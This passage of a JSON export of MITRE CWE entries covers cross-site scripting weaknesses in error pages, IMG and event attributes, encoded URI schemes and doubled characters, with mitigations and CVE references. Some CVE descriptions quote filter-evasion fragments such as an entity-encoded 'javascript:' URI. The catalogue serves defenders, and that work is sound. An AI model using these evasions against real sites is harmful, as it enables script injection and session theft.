browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0840","Description":"XSS in default error page from Host: header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840"},{"Reference":"CVE-2002-1053","Description":"XSS in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1053"},{"Reference":"CVE-2002-1700","Description":"XSS in error page from targeted parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1700"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS in error pages"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"198"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS in Error Pages","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in an Error Message Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in an Error Message Web Page","attr":{"@_Date":"2010-06-21"}}]}},"82":{"attr":{"@_ID":"82","@_Name":"Improper Neutralization of Script in Attributes of IMG Tags in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not neutralize or incorrectly neutralizes scripting elements within attributes of HTML IMG tags, such as the src attribute.","Extended_Description":"Attackers can embed XSS exploits into the values for IMG attributes (e.g. SRC) that is streamed and then executed in a victim\'s browser. Note that when the page is loaded into a user\'s browsers, the exploit will automatically execute.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"83","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2002-1649","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1649"},{"Reference":"CVE-2002-1803","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1803"},{"Reference":"CVE-2002-1804","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1804"},{"Reference":"CVE-2002-1805","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1805"},{"Reference":"CVE-2002-1806","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1806"},{"Reference":"CVE-2002-1807","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1807"},{"Reference":"CVE-2002-1808","Description":"javascript URI scheme in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1808"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Script in IMG tags"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Script in IMG Tags","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Script in Attributes of IMG Tags in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"83":{"attr":{"@_ID":"83","@_Name":"Improper Neutralization of Script in Attributes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes \\"javascript:\\" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0520","Description":"Bypass filtering of SCRIPT tags using onload in BODY, href in A, BUTTON, INPUT, and others.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0520"},{"Reference":"CVE-2002-1493","Description":"guestbook XSS in STYLE or IMG SRC attributes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1493"},{"Reference":"CVE-2002-1965","Description":"Javascript in onerror attribute of IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1965"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via onmouseover event.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2002-1681","Description":"XSS via script in &lt;P&gt; tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1681"},{"Reference":"CVE-2004-1935","Description":"Onload, onmouseover, and other events in an e-mail attachment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1935"},{"Reference":"CVE-2005-0945","Description":"Onmouseover and onload events in img, link, and mail tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0945"},{"Reference":"CVE-2003-1136","Description":"Javascript in onmouseover attribute in e-mail address or URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script in Attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"243"}},{"attr":{"@_CAPEC_ID":"244"}},{"attr":{"@_CAPEC_ID":"588"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script in Attributes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Script in Attributes in a Web Page","attr":{"@_Date":"2010-04-05"}}]}},"84":{"attr":{"@_ID":"84","@_Name":"Improper Neutralization of Encoded URI Schemes in a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Resolve all URIs to absolute or canonical representations before processing."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0563","Description":"Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL (\\"jav&amp;#X41sc&amp;#0010;ript:\\") in an IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563"},{"Reference":"CVE-2005-2276","Description":"Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. \\"j&amp;#X41vascript\\" in an IMG tag).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2276"},{"Reference":"CVE-2005-0692","Description":"Encoded script within BBcode IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0692"},{"Reference":"CVE-2002-0117","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0117"},{"Reference":"CVE-2002-0118","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0118"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XSS using Script Via Encoded URI Schemes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"XSS using Script Via Encoded URI Schemes","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Encoded URI Schemes in a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"85":{"attr":{"@_ID":"85","@_Name":"Doubled Character XSS Manipulations","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Resolve all filtered input to absolute or canonical representations before processing."},{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2086","Description":"XSS using \\"&lt;script\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"},{"Reference":"CVE-2000-0116","Description":"Encoded \\"javascript\\" in IMG tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DOUBLE - Doubled character XSS manipulations, e.g. \\"&lt;script\\""},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"245"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content 